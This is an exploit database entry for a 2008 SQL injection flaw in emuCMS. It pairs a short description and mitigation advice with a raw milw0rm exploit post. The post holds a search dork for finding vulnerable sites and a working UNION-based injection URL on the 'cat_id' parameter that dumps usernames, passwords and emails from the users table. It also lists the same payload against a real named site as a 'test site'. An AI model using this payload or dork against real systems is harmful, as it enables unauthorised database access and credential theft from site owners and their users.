emuCMS SQL Injection Vulnerability

vendor:

emuCMS

by:

TurkishWarriorr

CVSS

HIGH

SQL Injection

CWE

Product Name: emuCMS

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

emuCMS SQL Injection Vulnerability

This vulnerability allows an attacker to inject malicious SQL queries into the vulnerable application. The attacker can use this vulnerability to gain access to the database and extract sensitive information such as usernames, passwords, emails, etc. The vulnerable parameter is the ‘cat_id’ parameter in the ‘index.php’ page. The attacker can inject malicious SQL queries by using the ‘union’ keyword and the ‘concat’ function.

Mitigation:

The best way to mitigate this vulnerability is to use parameterized queries and input validation. The application should also be tested for SQL injection vulnerabilities.

Source

Exploit-DB raw data:

################################################## #######################
#
# AUTHOR : TurkishWarriorr
#
# HOME : http://www.1923turk.org
#
################################################## #######################
Dork : Powered by emuCMS

exploit : index.php?page=category&cat_id=-9999+union+all+select+1,concat(user,char(58),passw ,char(58),email),3,null,null,null,7,8,9,10,11,null +from+users--

Test Sites

http://www.emusoft.org/index.php?page=category&cat_id=-9999+union+all+select+1,concat(user,char(58),passw ,char(58),email),3,null,null,null,7,8,9,10,11,null +from+users--
################################################## ########################
www.1923turk.org 
turkish-warriorr@hotmail.com

# milw0rm.com [2008-06-20]